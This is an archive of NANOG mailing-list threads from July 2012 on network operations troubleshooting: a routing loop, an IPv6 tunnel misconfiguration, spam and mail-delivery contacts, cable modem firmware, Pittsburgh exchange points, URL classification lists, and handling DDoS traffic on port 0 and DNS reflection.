Sat, 21 Jul 2012 16:53:38 -0400 Subject: Attack on UDP 101 In-Reply-To: References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com> Message-ID: On Sat, Jul 21, 2012 at 3:12 PM, Shahab Vahabzadeh wrote: > Can hardware problem make something happen? > a CEF corruption could, but really... I'd start with on both devices: show ip route and see if perhaps they both point to each other... then resolve that problem. > On Sat, Jul 21, 2012 at 11:38 PM, Christopher Morrow > wrote: >> >> On Sat, Jul 21, 2012 at 2:41 PM, Shahab Vahabzadeh >> wrote: >> > Dear Stefan, >> > I have an 7206VXR Router with this design: >> > >> > int gig 0/1: directly connected to 3750 switch (uplink to internet) >> > int gig 0/2: vlan termination from PSTN centers >> > int virtual-template1: xdsl users >> > >> > Its about 4 days that I see near 300Mpbs outbound traffic in int gig0/1 >> > that there is no such a traffic in none of routers interface, but the >> > same >> > traffic is seen in 3750 peer interface. >> > I try to run monitor session on 3750 and monitor port traffic which I >> > see >> > that packet is generating from a user and its in a loop between 3750 and >> > 7206. >> >> I suspect that the 7206 and 3750 both thing the other guy has >> default... and with no more specific to follow the packet just >> pingpongs between the 2 devices. I would also suspect you see this for >> more than one destination :( >> >> picking just one entry (last entry I see) from route-views.routeviews.org: >> BGP routing table entry for 76.164.192.0/19, version 708055091 >> Paths: (35 available, best #31, table Default-IP-Routing-Table) >> ... >> 4436 6939 53340 36114 >> 69.31.111.244 from 69.31.111.244 (69.31.111.244) >> Origin IGP, metric 0, localpref 100, valid, external >> Community: 4436:21216 >> >> all of 36114(versaweb) traffic would seem to head through >> 53340(vegasnap) on the way home, so... maybe something else is going >> on like you didn't accept transit routes (or send them or something >> else) from your transit? hard to say with as little info as we see >> here, but :) >> >> > When I disconnect that user, I see that that packet is in loop again, >> > because of that I am sure its making a loop but I do not know the >> > reseaon >> > is that packets or not. >> > >> > Thanks >> > >> > >> > On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant < >> > sfouant at shortestpathfirst.net> wrote: >> > >> >> Can you give us more information? What do you mean it is causing Layer >> >> 3 >> >> loops? >> >> >> >> Stefan Fouant >> >> >> >> Sent from my HTC on the Now Network from Sprint! >> >> >> >> >> >> ----- Reply message ----- >> >> From: "Shahab Vahabzadeh" >> >> Date: Sat, Jul 21, 2012 10:50 am >> >> Subject: Attack on UDP 101 >> >> To: >> >> >> >> Hi there, >> >> Does any body know any report about attack on UDP Port 101 which make >> >> Layer >> >> 3 Loops? >> >> This is an example sniff: >> >> >> >> Source IP Address is : 76.164.199.86 >> >> Source port: 62946 Destination port: 101 >> >> 2012-07-21 11:11:09.646757 >> >> >> >> Thanks >> >> >> >> -- >> >> Regards, >> >> Shahab Vahabzadeh, Network Engineer and System Administrator >> >> >> >> Cell Phone: +1 (415) 871 0742 >> >> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 >> >> BF90 >> >> >> >> >> >> >> > >> > >> > -- >> > Regards, >> > Shahab Vahabzadeh, Network Engineer and System Administrator >> > >> > Cell Phone: +1 (415) 871 0742 >> > PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 > > > > > -- > Regards, > Shahab Vahabzadeh, Network Engineer and System Administrator > > Cell Phone: +1 (415) 871 0742 > PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 > From jeroen at mompl.net Sun Jul 22 02:40:02 2012 From: jeroen at mompl.net (Jeroen van Aart) Date: Sun, 22 Jul 2012 00:40:02 -0700 Subject: HE Fremont IPv6 tunnel Message-ID: <500BAE52.202@mompl.net> Recently I migrated the server that's running an HE IPv6 tunnel to one of the Fremont endpoints and now the tunnel is going down for a few minutes every couple of hours or so. I haven't been able yet to find a reason for this. I made sure the old server is not running any IPv6 related things anymore (such as radvd). I am curious if anyone knows if the Fremont endpoints are experiencing some problems? I have barely ever noticed any problems with the IPv6 tunnels so I am pretty sure it's not on HE's side, but I wanted to make sure. Thanks, Jeroen -- Earthquake Magnitude: 4.6 Date: Sunday, July 22, 2012 06:32:50 UTC Location: Santa Cruz Islands region Latitude: -10.6712; Longitude: 164.7985 Depth: 37.00 km From rmosher at he.net Sun Jul 22 02:53:00 2012 From: rmosher at he.net (Rob Mosher) Date: Sun, 22 Jul 2012 03:53:00 -0400 Subject: HE Fremont IPv6 tunnel In-Reply-To: <500BAE52.202@mompl.net> References: <500BAE52.202@mompl.net> Message-ID: <500BB15C.6020305@he.net> Perhaps you should try contacting HE support. I hear they're responsive. -- Rob Mosher Senior Network and Software Engineer Hurricane Electric / AS6939 On 7/22/2012 3:40 AM, Jeroen van Aart wrote: > > > I am curious if anyone knows if the Fremont endpoints are experiencing > some problems? I have barely ever noticed any problems with the IPv6 > tunnels so I am pretty sure it's not on HE's side, but I wanted to > make sure. From lyle at lcrcomputer.net Sun Jul 22 10:04:10 2012 From: lyle at lcrcomputer.net (Lyle Giese) Date: Sun, 22 Jul 2012 10:04:10 -0500 Subject: Postini/google email admin assistance requested Message-ID: <500C166A.3080909@lcrcomputer.net> I run a smaller email filter service for clients and starting Saturday, we are experiencing heavy traffic aimed at one email account. 99% of the traffic is coming from obsmtp.com servers. In the last 24 hrs, we have been getting over 1,000 attempts per hour to this account with a couple of peaks at 4,000 per hour. Not sure if they can help but an offlist contact from them would be nice. Sorry for the noise to the rest! Lyle Giese LCR Computer Services, Inc. From ops.lists at gmail.com Sun Jul 22 10:09:18 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Sun, 22 Jul 2012 20:39:18 +0530 Subject: Postini/google email admin assistance requested In-Reply-To: <500C166A.3080909@lcrcomputer.net> References: <500C166A.3080909@lcrcomputer.net> Message-ID: Did your customer set up an MX for their domain pointing to postini and then forward it to you? On Sun, Jul 22, 2012 at 8:34 PM, Lyle Giese wrote: > I run a smaller email filter service for clients and starting Saturday, we > are experiencing heavy traffic aimed at one email account. 99% of the > traffic is coming from obsmtp.com servers. > > In the last 24 hrs, we have been getting over 1,000 attempts per hour to > this account with a couple of peaks at 4,000 per hour. > > Not sure if they can help but an offlist contact from them would be nice. > > Sorry for the noise to the rest! -- Suresh Ramasubramanian (ops.lists at gmail.com) From johnl at iecc.com Sun Jul 22 11:14:09 2012 From: johnl at iecc.com (John Levine) Date: 22 Jul 2012 16:14:09 -0000 Subject: Postini/google email admin assistance requested In-Reply-To: Message-ID: <20120722161409.71092.qmail@joyce.lan> In article you write: >Did your customer set up an MX for their domain pointing to postini >and then forward it to you? obsmtp.com is Postini's outbound servers for customer mail. In my experience, they gush spam, and Postini management has been impressively hostile to the suggestion that a spam filtering company should, you know, filter spam. On my smallish mail server, I direct nearly all of their mail into the spamtrap, picking out only a handful of envelope domains that I've observed sending legit mail. R's, John >On Sun, Jul 22, 2012 at 8:34 PM, Lyle Giese wrote: >> I run a smaller email filter service for clients and starting Saturday, we >> are experiencing heavy traffic aimed at one email account. 99% of the >> traffic is coming from obsmtp.com servers. >> >> In the last 24 hrs, we have been getting over 1,000 attempts per hour to >> this account with a couple of peaks at 4,000 per hour. >> >> Not sure if they can help but an offlist contact from them would be nice. From sotnickd-nanog at ddv.com Sun Jul 22 13:56:05 2012 From: sotnickd-nanog at ddv.com (Dave Sotnick) Date: Sun, 22 Jul 2012 11:56:05 -0700 Subject: Comcast cable modem software update push Message-ID: Dear Nanog Users, I have recently been plagued by intermittent lockups on my Motorola BitSurfer 6121 cable modem, which I purchased based on Comcast's lists of recommended devices, and having good experience with Motorola products in the past. There's a good discussion on this topic here: http://goo.gl/SfHdh My technical question for the group is: When I finally talk to Comcast Tier 2 this week, what do I need to tell them to convince them that pushing out an update to SB6121 modems is a good idea? They seem convinced the onus is on Motorola to provide updates. This is not how DOCSIS 3.0 works! FWIW, the installed OS is 1.0.3.3 dated Aug 12 2010. The most recent I have heard of is 1.0.6.6. Apparently this fixes the lockups. Any tips greatly appreciated. -Dave From listbox at unix-boy.com Sun Jul 22 14:49:30 2012 From: listbox at unix-boy.com (Jeremy) Date: Sun, 22 Jul 2012 15:49:30 -0400 Subject: Comcast cable modem software update push In-Reply-To: References: Message-ID: <500C594A.2030208@unix-boy.com> On 7/22/2012 2:56 PM, Dave Sotnick wrote: > Dear Nanog Users, > > I have recently been plagued by intermittent lockups on my Motorola > BitSurfer 6121 cable modem, which I purchased based on Comcast's lists > of recommended devices, and having good experience with Motorola > products in the past. There's a good discussion on this topic here: > http://goo.gl/SfHdh > > My technical question for the group is: When I finally talk to Comcast > Tier 2 this week, what do I need to tell them to convince them that > pushing out an update to SB6121 modems is a good idea? They seem > convinced the onus is on Motorola to provide updates. This is not how > DOCSIS 3.0 works! > > FWIW, the installed OS is 1.0.3.3 dated Aug 12 2010. The most recent I > have heard of is 1.0.6.6. Apparently this fixes the lockups. > > Any tips greatly appreciated. > > -Dave > Dave, /lurk mode off Each MSO has its own procedures for reviewing and certifying firmware for their networks. The various DOCSIS features work with varying levels of success on different code revisions, so the testing tends to be extensive. When I worked at an MSO in my previous position, the process would be to lab test and then field soak for several months prior to releasing an update. Even then, we would still be bitten by bugs with strange trigger conditions. Assuming that process is the same at Comcast, you are likely to have little success in convincing them to speed up the deployment of new code, especially if the DOCSIS engineering group has not completed testing and fully vetted the code. You best bet is simply to see if there is newer code available that they have approved. Just for comparison, I have a Moto Surfboard 6121 attached to TWC and I'm on firmware version 1.0.5.1 dated 12/21/2010 (possibly installed when I was still a Cox customer). /lurk on Jeremy From ml at kenweb.org Sun Jul 22 21:44:34 2012 From: ml at kenweb.org (ML) Date: Sun, 22 Jul 2012 22:44:34 -0400 Subject: Pittsburgh IX? Message-ID: <500CBA92.8040901@kenweb.org> I was looking for information on any IX in Pittsburgh. Found PitX [1] ..info is rather limited to say the least. Is there any information out there about participants, size, etc? Are there any other IXes in or near Pittsburgh by chance? I see 3Rox out there but seems to be a R&E network mostly. -ML [1] http://www.pitx.net/ From jeroen at mompl.net Sun Jul 22 22:44:59 2012 From: jeroen at mompl.net (Jeroen van Aart) Date: Sun, 22 Jul 2012 20:44:59 -0700 Subject: HE Fremont IPv6 tunnel In-Reply-To: <500BB15C.6020305@he.net> References: <500BAE52.202@mompl.net> <500BB15C.6020305@he.net> Message-ID: <500CC8BB.7000907@mompl.net> Rob Mosher wrote: > Perhaps you should try contacting HE support. I hear they're responsive. I understand however I was pretty sure it wasn't the tunnel that was the problem. So I didn't feel emailing HE was appropriate. I am curious, since I have pretty much confirmed the problem is on my side, why would a move of an IPv6 tunnel from one server to another suddenly cause intermittent outages of a few minutes every couple of hours. It's not as regular so as to suspect a cronjob or something. The old server is still online, however the radvd daemon isn't running there anymore and its external interface has been disabled. There is no IPv6 dhcp server running either. The new server basically has the configuration and IP addresses the old one used to have. It's running radvd. Is there some (obvious) residual effect of having moved an IPv6 tunnel from one physical server to another that I fail to recognise? I have moved ethernet interfaces and cables on the new server to rule out a fault in those. Its internal interface (on the same ethernet card) appears very stable. Thanks, Jeroen -- Earthquake Magnitude: 5.2 Date: Monday, July 23, 2012 00:22:05 UTC Location: near the north coast of Papua, Indonesia Latitude: -2.5213; Longitude: 135.3425 Depth: 10.40 km From streiner at cluebyfour.org Sun Jul 22 23:17:51 2012 From: streiner at cluebyfour.org (Justin M. Streiner) Date: Mon, 23 Jul 2012 00:17:51 -0400 (EDT) Subject: Pittsburgh IX? In-Reply-To: <500CBA92.8040901@kenweb.org> References: <500CBA92.8040901@kenweb.org> Message-ID: On Sun, 22 Jul 2012, ML wrote: > I was looking for information on any IX in Pittsburgh. Found PitX [1] ..info > is rather limited to say the least. Is there any information out there about > participants, size, etc? I'm not 100% sure if PitX is still in operation. I know the guys who ran it, and can check what the status is, if you want. > Are there any other IXes in or near Pittsburgh by chance? I see 3Rox out > there but seems to be a R&E network mostly. 3ROX is primarily R&E, but there are a few commercial providers who peer there - Comcast is the biggest one that comes to mind. I have contacts there as well, if you're interested in looking into it. Beyond that, I don't think there are any IXes in the Pittsburgh area. jms From jeroen at mompl.net Mon Jul 23 02:33:48 2012 From: jeroen at mompl.net (Jeroen van Aart) Date: Mon, 23 Jul 2012 00:33:48 -0700 Subject: HE Fremont IPv6 tunnel In-Reply-To: <500CC8BB.7000907@mompl.net> References: <500BAE52.202@mompl.net> <500BB15C.6020305@he.net> <500CC8BB.7000907@mompl.net> Message-ID: <500CFE5C.8050209@mompl.net> Jeroen van Aart wrote: > I am curious, since I have pretty much confirmed the problem is on my > side, why would a move of an IPv6 tunnel from one server to another A helpful person pointed me in the right direction. Multiple times I checked the /etc/network/interfaces file and didn't spot it. But I had forgotten to remove the gateway for the internal interface... after switching IPs and enabling the external interface. Stupid mistake, and obviously it sort of works, but not well. Thanks, Jeroen -- Earthquake Magnitude: 5.1 Date: Monday, July 23, 2012 06:54:24 UTC Location: Near Islands, Aleutian Islands, Alaska Latitude: 51.4620; Longitude: 171.7920 Depth: 33.00 km From seitz at strato-rz.de Mon Jul 23 07:45:57 2012 From: seitz at strato-rz.de (Christian Seitz) Date: Mon, 23 Jul 2012 14:45:57 +0200 Subject: msn/hotmail email admin needed Message-ID: <500D4785.4000805@strato-rz.de> Hello, would an email admin from msm/hotmail please contact me off-list? We have problems sending emails to msn/hotmail from several ip addresses and trying to find someone who can help. Thanks in advance. Sorry for spamming this list, but establishing a direct contact or opening tickets did not work. Regards, Christian Seitz Network Operations -- --------------------------------------------------------------------------- Telefon: +49 (0)30 - 398 02 0 E-Mail : seitz at strato-rz.de Website: http://www.strato.de/ --------------------------------------------------------------------------- STRATO AG Pascalstr. 10 10587 Berlin --------------------------------------------------------------------------- Vorsitzender des Aufsichtsrates: Phil Zamani Vorstand: Damian Schmidt (Vorsitz), Julien Ardisson, Christian Mueller, Christoph Steffens, Rene Wienholtz Amtsgericht Berlin-Charlottenburg HRB 79450 From the.lists at mgm51.com Mon Jul 23 08:05:54 2012 From: the.lists at mgm51.com (Mike.) Date: Mon, 23 Jul 2012 09:05:54 -0400 Subject: Comcast cable modem software update push In-Reply-To: References: Message-ID: <201207230905540270.0014D336@sentry.24cl.com> On 7/22/2012 at 11:56 AM Dave Sotnick wrote: |Dear Nanog Users, | |I have recently been plagued by intermittent lockups on my Motorola |BitSurfer 6121 cable modem, which I purchased based on Comcast's lists |of recommended devices, and having good experience with Motorola |products in the past. There's a good discussion on this topic here: |http://goo.gl/SfHdh | |My technical question for the group is: When I finally talk to Comcast |Tier 2 this week, what do I need to tell them to convince them that |pushing out an update to SB6121 modems is a good idea? They seem |convinced the onus is on Motorola to provide updates. This is not how |DOCSIS 3.0 works! | |FWIW, the installed OS is 1.0.3.3 dated Aug 12 2010. The most recent I |have heard of is 1.0.6.6. Apparently this fixes the lockups. | |Any tips greatly appreciated. | |-Dave ============= Some more info here: http://www.dslreports.com/forum/r27346001-SB6120-Firmware-Updated-7-19-1 2- shortened: http://goo.gl/9fZRW From ops.lists at gmail.com Mon Jul 23 08:22:21 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Mon, 23 Jul 2012 18:52:21 +0530 Subject: msn/hotmail email admin needed In-Reply-To: <500D4785.4000805@strato-rz.de> References: <500D4785.4000805@strato-rz.de> Message-ID: Fixing whatever is the spam issue is about the only way you will get off their filters. All the hotmail support team will send you back is boilerplate that tells you much the same (maybe in a few more paragraphs, and with links to microsoft's policy) If that means securing your outbound mailservers against spam .. or booting some customers - you might as well get it over and done with --srs On Mon, Jul 23, 2012 at 6:15 PM, Christian Seitz wrote: > > would an email admin from msm/hotmail please contact me off-list? We have > problems sending emails to msn/hotmail from several ip addresses and > trying to > find someone who can help. Thanks in advance. > > Sorry for spamming this list, but establishing a direct contact or opening > tickets did not work. > -- Suresh Ramasubramanian (ops.lists at gmail.com) From dave at temk.in Mon Jul 23 15:13:58 2012 From: dave at temk.in (David Temkin) Date: Mon, 23 Jul 2012 16:13:58 -0400 Subject: Reminder: Call for Presentations Open for NANOG 56 in Dallas, TX Message-ID: <500DB086.8010303@temk.in> NANOG Community, After a great NANOG in Vancouver, BC, the survey results are in from 55 and we are already assembling a world-class program for NANOG 56. The North American Network Operators' Group (NANOG) will hold its 56th meeting in Dallas, TX on October 21 - 23, 2012 and join with ARIN on October 24, 2012. Terremark, a Verzion company, will be our host for NANOG 56. The NANOG Program Committee is now seeking proposals for presentations, panels, tutorials, tracks sessions, and keynote materials for the NANOG 56 program. We invite presentations highlighting issues relating to technology already deployed or soon-to-be deployed in the Internet. Vendors are encouraged to work with operators to present real-world deployment experiences with the vendor's products and interoperability. NANOG 56 submissions are welcome at http://pc.nanog.org For further information on what the Program Committee is seeking, please see http://www.nanog.org/meetings/nanog56/callforpresentations.html When considering submitting a presentation, keep these important dates in mind: Presentation Abstracts and Draft Slides Due: 06-August-2012 Final Slides Due: 27-August-2012 Draft Program Published: 17-September-2012 Final Agenda Published: 1-October-2012 Please submit your materials to http://pc.nanog.org Looking forward to seeing everyone in Dallas! -Dave Temkin (Chair, NANOG Program Committee) From dave at temk.in Mon Jul 23 15:13:58 2012 From: dave at temk.in (David Temkin) Date: Mon, 23 Jul 2012 16:13:58 -0400 Subject: [NANOG-announce] Reminder: Call for Presentations Open for NANOG 56 in Dallas, TX Message-ID: <500DB086.8010303@temk.in> NANOG Community, After a great NANOG in Vancouver, BC, the survey results are in from 55 and we are already assembling a world-class program for NANOG 56. The North American Network Operators' Group (NANOG) will hold its 56th meeting in Dallas, TX on October 21 - 23, 2012 and join with ARIN on October 24, 2012. Terremark, a Verzion company, will be our host for NANOG 56. The NANOG Program Committee is now seeking proposals for presentations, panels, tutorials, tracks sessions, and keynote materials for the NANOG 56 program. We invite presentations highlighting issues relating to technology already deployed or soon-to-be deployed in the Internet. Vendors are encouraged to work with operators to present real-world deployment experiences with the vendor's products and interoperability. NANOG 56 submissions are welcome at http://pc.nanog.org For further information on what the Program Committee is seeking, please see http://www.nanog.org/meetings/nanog56/callforpresentations.html When considering submitting a presentation, keep these important dates in mind: Presentation Abstracts and Draft Slides Due: 06-August-2012 Final Slides Due: 27-August-2012 Draft Program Published: 17-September-2012 Final Agenda Published: 1-October-2012 Please submit your materials to http://pc.nanog.org Looking forward to seeing everyone in Dallas! -Dave Temkin (Chair, NANOG Program Committee) -------------- next part -------------- _______________________________________________ NANOG-announce mailing list NANOG-announce at nanog.org https://mailman.nanog.org/mailman/listinfo/nanog-announce From woody at pch.net Mon Jul 23 19:13:51 2012 From: woody at pch.net (Bill Woodcock) Date: Mon, 23 Jul 2012 17:13:51 -0700 Subject: Pittsburgh IX? In-Reply-To: <500CBA92.8040901@kenweb.org> References: <500CBA92.8040901@kenweb.org> Message-ID: On Jul 22, 2012, at 7:44 PM, ML wrote: > I was looking for information on any IX in Pittsburgh. Found PitX [1] ..info is rather limited to say the least. Is there any information out there about participants, size, etc? Here: https://prefix.pch.net/applications/ixpdir/detail.php?exchange_point_id=331 Last known was seven participants and 5Mbps of traffic, but they reorganized their web site and no longer have members or traffic graph pages at the previous locations. I'll have our research staff start digging into it. -Bill From sotnickd-nanog at ddv.com Tue Jul 24 11:28:25 2012 From: sotnickd-nanog at ddv.com (Dave Sotnick) Date: Tue, 24 Jul 2012 09:28:25 -0700 Subject: Comcast cable modem software update push In-Reply-To: References: Message-ID: Well I'm not sure if it was the squeaky wheel getting the grease or just good timing, but I'm happy to report that this morning my Motorola SB6121 grabbed the firmware update and is now running the latest code. I'm fairly confident this will resolve my lockups. Thanks, Nanog! -Dave On Sun, Jul 22, 2012 at 11:56 AM, Dave Sotnick wrote: > Dear Nanog Users, > > I have recently been plagued by intermittent lockups on my Motorola > BitSurfer 6121 cable modem, which I purchased based on Comcast's lists > of recommended devices, and having good experience with Motorola > products in the past. There's a good discussion on this topic here: > http://goo.gl/SfHdh > > My technical question for the group is: When I finally talk to Comcast > Tier 2 this week, what do I need to tell them to convince them that > pushing out an update to SB6121 modems is a good idea? They seem > convinced the onus is on Motorola to provide updates. This is not how > DOCSIS 3.0 works! > > FWIW, the installed OS is 1.0.3.3 dated Aug 12 2010. The most recent I > have heard of is 1.0.6.6. Apparently this fixes the lockups. > > Any tips greatly appreciated. > > -Dave From nathan at atlasnetworks.us Tue Jul 24 13:37:24 2012 From: nathan at atlasnetworks.us (Nathan Eisenberg) Date: Tue, 24 Jul 2012 18:37:24 +0000 Subject: Contact from slb.com/Schlumberger Limited/Dexanet Message-ID: <8C26A4FDAE599041A13EB499117D3C2889ACE92D@EX-MB-1.corp.atlasnetworks.us> Would a security contact from Schlumberger Limited please contact me off-list? Sorry for the noise. Nathan Eisenberg From joesox at gmail.com Tue Jul 24 20:30:18 2012 From: joesox at gmail.com (JoeSox) Date: Tue, 24 Jul 2012 18:30:18 -0700 Subject: url category database, flat file lists, or API Message-ID: Does anyone know of a open source database, flat file lists, or API that allows me to feed a url and have it return a category classification For example, something like this http://www1.k9webprotection.com/support/check-site-rating I know of dansguardian but it doesn't have battlefield.com as a game site and is more of a blacklist. I thought I saw one a few years back but it was only for linux but still had categories. -- Thanks, Joe From morrowc.lists at gmail.com Tue Jul 24 20:32:10 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 24 Jul 2012 21:32:10 -0400 Subject: url category database, flat file lists, or API In-Reply-To: References: Message-ID: http://www.urlfilterdb.com/en/support/faq.html On Tue, Jul 24, 2012 at 9:30 PM, JoeSox wrote: > Does anyone know of a open source database, flat file lists, or API > that allows me to feed a url and have it return a category > classification > For example, something like this > http://www1.k9webprotection.com/support/check-site-rating > > I know of dansguardian but it doesn't have battlefield.com as a game > site and is more of a blacklist. > I thought I saw one a few years back but it was only for linux but > still had categories. > -- > Thanks, Joe > From morrowc.lists at gmail.com Tue Jul 24 20:32:42 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 24 Jul 2012 21:32:42 -0400 Subject: url category database, flat file lists, or API In-Reply-To: References: Message-ID: from this search, fyi: https://www.google.com/search?q=squid+url+filtering+classification On Tue, Jul 24, 2012 at 9:32 PM, Christopher Morrow wrote: > http://www.urlfilterdb.com/en/support/faq.html > > On Tue, Jul 24, 2012 at 9:30 PM, JoeSox wrote: >> Does anyone know of a open source database, flat file lists, or API >> that allows me to feed a url and have it return a category >> classification >> For example, something like this >> http://www1.k9webprotection.com/support/check-site-rating >> >> I know of dansguardian but it doesn't have battlefield.com as a game >> site and is more of a blacklist. >> I thought I saw one a few years back but it was only for linux but >> still had categories. >> -- >> Thanks, Joe >> From joesox at gmail.com Tue Jul 24 20:40:22 2012 From: joesox at gmail.com (JoeSox) Date: Tue, 24 Jul 2012 18:40:22 -0700 Subject: url category database, flat file lists, or API In-Reply-To: References: Message-ID: Looks like urlfilterdb isn't completely free but might be a solution. I forgot the SQUID might have builtin classifications so I need to look at that. -- Thanks, Joe On Tue, Jul 24, 2012 at 6:32 PM, Christopher Morrow wrote: > from this search, fyi: > > https://www.google.com/search?q=squid+url+filtering+classification > > On Tue, Jul 24, 2012 at 9:32 PM, Christopher Morrow > wrote: >> http://www.urlfilterdb.com/en/support/faq.html >> >> On Tue, Jul 24, 2012 at 9:30 PM, JoeSox wrote: >>> Does anyone know of a open source database, flat file lists, or API >>> that allows me to feed a url and have it return a category >>> classification >>> For example, something like this >>> http://www1.k9webprotection.com/support/check-site-rating >>> >>> I know of dansguardian but it doesn't have battlefield.com as a game >>> site and is more of a blacklist. >>> I thought I saw one a few years back but it was only for linux but >>> still had categories. >>> -- >>> Thanks, Joe >>> From frnkblk at iname.com Tue Jul 24 22:40:34 2012 From: frnkblk at iname.com (Frank Bulk) Date: Tue, 24 Jul 2012 22:40:34 -0500 Subject: DDoS using port 0 and 53 (DNS) Message-ID: <003101cd6a17$3f81ddc0$be859940$@iname.com> Several times this year our customers have suffered DDoS' ranging from 30 Mbps to over 1 Gbps, sometimes sustained, sometimes in a several minute spurts. They are targeted at one IP address, and most times our netflow tool identifies that a large percentage of the traffic is "port 0". The one from today had about 89% port 0 and 11% port 53 (DNS). If it happens repeatedly or continuously we just have our upstream provider blackhole the target (victim) IP address. I've been tempted to ask our upstream provider to block all traffic to us that's targeted to tcp or udp port 0 -- is that safe to do? I found two NANOG archives that talk about this http://www.nanog.org/mailinglist/mailarchives/old_archive/2005-04/msg00091.h tml http://www.gossamer-threads.com/lists/nanog/users/18990 and the first suggests that port zero could really be fragmented packets. Unfortunately I don't have packet captures of any of the attacks, so I can't exam them for more detail, but wondering if there was some collective wisdom about blocking port 0. Regards, Frank From rdobbins at arbor.net Tue Jul 24 23:05:48 2012 From: rdobbins at arbor.net (Roland Dobbins) Date: Wed, 25 Jul 2012 11:05:48 +0700 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <003101cd6a17$3f81ddc0$be859940$@iname.com> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: Frank Bulk wrote: >Unfortunately I don't have packet captures of any of the attacks, so I >can't exam them for more detail, but wondering if there was some >collective wisdom about blocking port 0. Yes - don't do it, or you will break the Internet. These are non-initial fragments. You or your customers are on the receiving end of DNS reflection/amplification attacks, and the large unsolicited DNS responses being used to packet you/them are fragmented. Use S/RTBH, flowspec, IDMS, and/or coordination with your peers/upstreams to block these attacks when they occur. Do *not* perform wholesale blocking of non-initial fragments (i.e., src/dst port 0), or you will have many unhappy customers and soon-to-be former customers. ;> ----------------------------------- Roland Dobbins From mysidia at gmail.com Tue Jul 24 23:10:52 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Tue, 24 Jul 2012 23:10:52 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <003101cd6a17$3f81ddc0$be859940$@iname.com> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: On 7/24/12, Frank Bulk wrote: > Unfortunately I don't have packet captures of any of the attacks, so I > can't exam them for more detail, but wondering if there was some collective > wisdom about blocking port 0. It should be relatively safe to drop (non-fragment) packets to/from port 0. If I recall correctly, there are some routers that perform a "helpful" numeric value validation when the human is entering port numbers for access list rules, that _do_ forward port 0 traffic, and through some sort of oversight by the router/firewall vendor actually _prevent_ the administrator from selecting port 0 in a deny rule, eg. "Port to deny must be a number from 1 to 65535". TCP/UDP port 0 is technically a legal port, but it's also a reserved port, and very unusual for it to be used on the network for any legitimate purpose. Various firewalls will discard anything TCP/UDP sent to/from port 0. Many TCP/UDP sockets implementations won't even let an application select port 0. bind() to port 0 is treated as a signal that the application wants the sockets API to pick a high-numbered ephemeral port. > Regards, > Frank -- -JH From frnkblk at iname.com Tue Jul 24 23:50:06 2012 From: frnkblk at iname.com (Frank Bulk) Date: Tue, 24 Jul 2012 23:50:06 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <003f01cd6a20$f66cb6f0$e34624d0$@iname.com> Thanks for confirming what was discussed in the NANOG archive. I now have warm fuzzies knowing that all my protections are reactive. =) I will be talking with our upstream provider to see if they can enable some better automation (because they run a larger shop). I know they were able to null route in seconds, we just need a faster way to identify targets. Frank -----Original Message----- From: Roland Dobbins [mailto:rdobbins at arbor.net] Sent: Tuesday, July 24, 2012 11:06 PM To: Frank Bulk; nanog at nanog.org Subject: Re: DDoS using port 0 and 53 (DNS) Frank Bulk wrote: >Unfortunately I don't have packet captures of any of the attacks, so I >can't exam them for more detail, but wondering if there was some >collective wisdom about blocking port 0. Yes - don't do it, or you will break the Internet. These are non-initial fragments. You or your customers are on the receiving end of DNS reflection/amplification attacks, and the large unsolicited DNS responses being used to packet you/them are fragmented. Use S/RTBH, flowspec, IDMS, and/or coordination with your peers/upstreams to block these attacks when they occur. Do *not* perform wholesale blocking of non-initial fragments (i.e., src/dst port 0), or you will have many unhappy customers and soon-to-be former customers. ;> ----------------------------------- Roland Dobbins From mysidia at gmail.com Wed Jul 25 00:08:19 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Wed, 25 Jul 2012 00:08:19 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: On 7/24/12, Roland Dobbins wrote: > Frank Bulk wrote: >>can't exam them for more detail, but wondering if there was some >>collective wisdom about blocking port 0. > Yes - don't do it, or you will break the Internet. These are non-initial Without a packet capture to look at, that's really just a blind assumption. A port number of a non-initial fragment does not exist at all, because the Layer 4 info is unavailable in that case, something _might_ lie and say the port number is 0, but it should not -- there is no TCP header with any port numbers, the only fields available to check against on such packets are Layer 3 fields such as protocol, source, destination address. The port number of the Layer 4 connection cannot be determined without executing IP fragment reassembly in that case. Routers normally reassemble fragments they receive, if possible. An access list statement attempting to match against non-present Layer 4 information, should not work; on a stateful firewall, the presence of the rule might trigger a fragment reassembly, on a router, the non-applicable ACL entry referring to a non-existent port number will generally be ignored. A full capture should not be necessary. You determine if a packet is a fragment by examining the MF flag, bit 50, and fragmentation offset of the IPv4 header; bits 51 through 63. You only need to look at the first 8 bytes of the IP header. If the MF bit is set to 0, and the fragmentation offset is also all bits 0, then the packet is not part of a fragment. The packet is a non-initial fragment if and only if, the fragmentation offset is not set to zero. Port number's not a field you look at for that. -- -JH From sthaug at nethelp.no Wed Jul 25 01:13:20 2012 From: sthaug at nethelp.no (sthaug at nethelp.no) Date: Wed, 25 Jul 2012 08:13:20 +0200 (CEST) Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <20120725.081320.74666464.sthaug@nethelp.no> > The port number of the Layer 4 connection cannot be determined without > executing IP fragment reassembly in that case. Routers normally > reassemble fragments they receive, if possible. No, routers normally do *not* reassemble fragments. This is typically done by hosts and firewalls. Steinar Haug, Nethelp consulting, sthaug at nethelp.no From rdobbins at arbor.net Wed Jul 25 01:49:40 2012 From: 